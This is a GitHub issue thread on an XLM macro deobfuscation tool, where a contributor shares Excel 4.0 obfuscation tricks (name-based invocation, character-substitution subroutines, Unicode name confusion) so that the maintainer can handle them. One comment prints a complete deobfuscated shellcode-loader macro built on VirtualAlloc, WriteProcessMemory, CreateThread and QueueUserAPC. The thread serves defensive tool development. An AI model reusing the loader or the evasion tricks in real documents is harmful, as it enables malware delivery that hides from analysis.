Named function invocations can break deobfuscation #40

Open
michaelweber opened this issue May 26, 2020 · 9 comments
Labels
enhancement New feature or request

@michaelweber

Excel macro sheets can replicate the effect of a RUN() invocation: define a name, then invoke it from a cell by appending () to the name.

For example:

=SET.NAME("InvokeMe",B1)
=InvokeMe()

is identical to calling RUN(B1). You can chain these expressions together as well, for example:

=SET.NAME("IndirectFunction","=B1")
=SET.NAME("IndirectInvocation",EVALUATE("IndirectFunction"))
=IndirectInvocation()

will also replicate calling RUN(B1). It looks like invoking a name and treating it as a RUN() expression hasn't been added to the tool's grammar yet. Here's a small PoC for both of these cases, which should help if maldoc authors start abusing this.
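To make the two cases above concrete, here is a minimal Python sketch of how an emulator might rewrite a name invocation as a RUN() call. It is not XLMMacroDeobfuscator's implementation: the helpers `set_name`, `evaluate`, and `rewrite_name_call` are hypothetical, names are stored in a plain dict, and only the bare `=Name()` form is handled.

```python
import re

# Matches a formula that is nothing but a zero-argument call, e.g. "=InvokeMe()".
NAME_CALL = re.compile(r"=([A-Za-z_][A-Za-z0-9_.]*)\(\)")


def set_name(names, name, value):
    """Hypothetical stand-in for SET.NAME: store the value under a case-insensitive key."""
    names[name.lower()] = value


def evaluate(text, names, depth=0):
    """Follow name -> value links until the text is no longer a defined name."""
    if depth > 16:
        raise RecursionError("name chain too deep")
    key = text.lstrip("=").lower()
    if key in names:
        return evaluate(names[key], names, depth + 1)
    return text.lstrip("=")


def rewrite_name_call(formula, names):
    """Rewrite '=Name()' as '=RUN(target)' when Name is defined; otherwise leave it alone."""
    match = NAME_CALL.fullmatch(formula)
    if match is None or match.group(1).lower() not in names:
        return formula
    return "=RUN({})".format(evaluate(match.group(1), names))


names = {}
# Case 1: =SET.NAME("InvokeMe",B1) followed by =InvokeMe()
set_name(names, "InvokeMe", "B1")
# Case 2: the chained form that goes through EVALUATE()
set_name(names, "IndirectFunction", "=B1")
set_name(names, "IndirectInvocation", evaluate("IndirectFunction", names))

print(rewrite_name_call("=InvokeMe()", names))
print(rewrite_name_call("=IndirectInvocation()", names))
```

Built-ins such as =HALT() pass through unchanged because they are not defined names in the dict.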

setname-obfuscation.xls.zip

@DissectMalware
Owner

DissectMalware commented May 27, 2020

Interesting. I will add these functions. No need to update the grammar, I suppose.

SET.NAME is used to define a name...

SET.NAME is partially implemented

@DissectMalware DissectMalware added the enhancement New feature or request label May 27, 2020
@DissectMalware DissectMalware self-assigned this May 27, 2020
@michaelweber
Author

I generated a new sample based on an upcoming Macrome release: a wrapped-up version of EXCELntDonut with some obfuscation thrown in. It makes light use of SET.NAME aliasing through statements like varName=123, which may or may not work. The "final" macro, after unpacking all the CHAR() statements, looks like:

=GOTO($A$2)
=GOTO($A$3)
=GOTO($A$4)
=GOTO($A$5)
=GOTO($A$6)
=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","WriteProcessMemory","JJJCJJ","WProcessMemory",,1,9)
=REGISTER("Kernel32","CreateThread","JJJJJJJ","CThread",,1,9)
=IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO($A$10),GOTO($A$21))
=Valloc(0,65536,4096,64)
šœƒ=$B$1
=SET.VALUE($D$1,0)
=WHILE(šœƒ<>"excel")
=SET.VALUE($D$2,LEN(šœƒ))
=WProcessMemory(-1,$A$10+($D$1*255),šœƒ,LEN(šœƒ),0)
=SET.VALUE($D$1,$D$1+1)
šœƒ=ABSREF("R[1]C",šœƒ)
=NEXT()
=CThread(0,0,$A$10,0,0,0)
=HALT()
1342439424
0
=WHILE($A$22=0)
=SET.VALUE($A$22,Valloc($A$21,65536,12288,64))
=SET.VALUE($A$21,$A$21+262144)
=NEXT()
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
šœƒ=$C$1
=SET.VALUE($D$1,0)
=WHILE(šœƒ<>"EXCEL")
=SET.VALUE($D$2,LEN(šœƒ))
=RTL($A$22+($D$1*10),šœƒ,LEN(šœƒ))
=SET.VALUE($D$1,$D$1+1)
šœƒ=ABSREF("R[1]C",šœƒ)
=NEXT()
=Queue($A$22,-2,0)
=Go()
=SET.VALUE($A$22,0)
=HALT()

As an added "treat", the cells that are built contain raw binary strings rather than wrapping them as CHAR(). It looks like XLMMacroDeobfuscator handles this fine (though the console plays a bunch of alerts as it prints, which tends to slow down the output), but this may slightly frustrate some of the binary dumping.
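One way a tool could avoid the console alerts is to escape non-printable characters before printing a cell. The sketch below assumes the alerts come from control characters such as BEL (0x07) in the raw binary strings; that cause is a guess, and `escape_for_console` is a hypothetical helper, not part of XLMMacroDeobfuscator.

```python
def escape_for_console(text):
    """Replace non-printable characters with \\xNN or \\uNNNN escapes."""
    out = []
    for ch in text:
        if ch.isprintable():
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append("\\x{:02x}".format(ord(ch)))
        else:
            out.append("\\u{:04x}".format(ord(ch)))
    return "".join(out)


# A raw string containing BEL and NUL prints as visible escapes instead of beeping.
print(escape_for_console("A\x07B\x00"))
```

The original string is left untouched, so a binary dump can still work from the unescaped value.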

excelntdonut-macrome.xls.zip

@michaelweber
Author

I generated an alternate document which can also cause some issues by abusing user-defined functions combined with variables set using SET.NAME.

By hiding a subroutine somewhere else in the sheet (it can be as simple as =RETURN(CHAR(var))), we can fake passing an argument to the subroutine and invoke it with a call like:

=IF(SET.NAME("var",73),InvokeChar(),)

This is equivalent to =CHAR(73).

Right now this sort of approach will not be emulated, so once the GOTO() is reached, there's no content shown.
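The pattern can be modeled roughly as follows. This is a sketch under stated assumptions, not the tool's emulation logic: `set_name`, `invoke_char`, and `emulate_cell` are hypothetical, SET.NAME is assumed to return a truthy value (which the IF() above relies on), and Python's `chr()` only matches Excel's CHAR() for codes below 128.

```python
def set_name(names, name, value):
    """Hypothetical SET.NAME: store the value and report success."""
    names[name.lower()] = value
    return True  # assumed truthy, so the IF() takes its true branch


def invoke_char(names):
    """Stand-in for the hidden subroutine =RETURN(CHAR(var))."""
    return chr(names["var"])  # chr() matches CHAR() only for codes below 128


def emulate_cell(names, code):
    """Model =IF(SET.NAME("var",code),InvokeChar(),)."""
    if set_name(names, "var", code):
        return invoke_char(names)
    return None


names = {}
# Three cells of this form, evaluated in order, spell out a string one character at a time.
decoded = "".join(emulate_cell(names, code) for code in (73, 69, 88))
print(decoded)
```

The point is that the "argument" travels through shared name state rather than through the call itself, so an emulator has to apply the SET.NAME side effect before evaluating the subroutine.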

charsub-method.xls.zip

@michaelweber
Author

Here's a slightly more refined version of the character substitution approach. This time the variable names take advantage of some Unicode silliness in Excel. In the Excel UI, a cell looks like:

[Image: some example cells]

I can't copy and paste the content out of Excel directly, since there are null bytes in the formula and it will truncate at those bytes.

charsub-unicode-name-magic.zip

@DissectMalware
Owner

> Generated an alternate document which can also cause some issues by abusing user defined functions combined with variables set using SET.NAME.
>
> By hiding a subroutine in the sheet somewhere else (it can be simple like, =RETURN(CHAR(var))), we can fake pass an argument to the subroutine and invoke it by making a call like:
>
> =IF(SET.NAME("var",73),InvokeChar(),)
>
> Which is identical to =CHAR(73).
>
> Right now this sort of approach will not be emulated, so once the GOTO() is reached, there's no content shown.
>
> charsub-method.xls.zip

This is addressed in v0.1.5 (currently on the master branch).

@michaelweber
Author

Uploading a sample which takes advantage of some more Unicode ridiculousness: in names, Excel treats ḁ (U+1E01, bytes 1E 01) and A (U+0041) followed by ◌̥ (U+0325) (bytes 00 41 03 25) as the same character.
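The equivalence is consistent with case folding followed by canonical composition, which Python's standard library can demonstrate. Whether Excel actually applies Unicode normalization is not established here, so treat `name_key` below as a hypothetical comparison key rather than Excel's algorithm.

```python
import unicodedata


def name_key(name):
    """Hypothetical comparison key: case-fold, then compose to NFC."""
    return unicodedata.normalize("NFC", name.casefold())


precomposed = "\u1e01"   # LATIN SMALL LETTER A WITH RING BELOW
decomposed = "A\u0325"   # LATIN CAPITAL LETTER A + COMBINING RING BELOW

# The raw UTF-16 bytes differ, matching the byte sequences quoted above.
print(precomposed.encode("utf-16-be").hex())
print(decomposed.encode("utf-16-be").hex())

# The raw strings differ, but the keys agree.
print(precomposed == decomposed)
print(name_key(precomposed) == name_key(decomposed))
```

An emulator that stores names under a key like this would resolve both spellings to the same entry, at the cost of possibly merging names that Excel itself keeps distinct.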

unicode_decomposition.xls.zip

@DissectMalware
Owner

That makes sense, to be honest. The same goes for À, which can be represented either as two characters (A plus a combining accent) or as a single Unicode character.

@michaelweber
Author

Here's a refinement of that abuse that attackers could use to obscure which argument is being passed to a function during analysis. In the sample below, each cell uses an AND statement to execute two SET.NAME calls before invoking the user-defined function. One SET.NAME sets the value to be used; the other sets a decoy value under a name that differs only at the byte level (the difference is imperceptible to the eye). Whether the first or second SET.NAME call sets the real argument is randomized per cell.

[Image]
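When two names render identically, listing their code points makes the difference visible to an analyst. The helper below is a hypothetical triage aid built on Python's `unicodedata` module; it does not model how Excel decides which name matches.

```python
import unicodedata


def describe(name):
    """List each code point of a name with its Unicode character name."""
    return [
        "U+{:04X} {}".format(ord(ch), unicodedata.name(ch, "<unnamed>"))
        for ch in name
    ]


# Two spellings that look the same on screen but differ in code points.
for candidate in ("\u1e01", "a\u0325"):
    print(describe(candidate))
```

Running this over every name passed to SET.NAME in a cell shows at a glance which of two look-alike names carries extra or different code points.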

unicode_specification_abuse.xls.zip

@michaelweber
Author

Yeah, the capitalization handling is pretty reasonable. The issue is the uneven handling of things like Unicode whitespace characters, or Unicode characters that are simply ignored. For example:

[Image: unicode_name_confusion_adjusted_for_endianness]

The fact that the Lbl record string and the "real" arg string are considered a match, but the "decoy" arg string is not, makes me wonder how much of this behavior follows the Unicode specification versus a series of arbitrary edge-case handling.
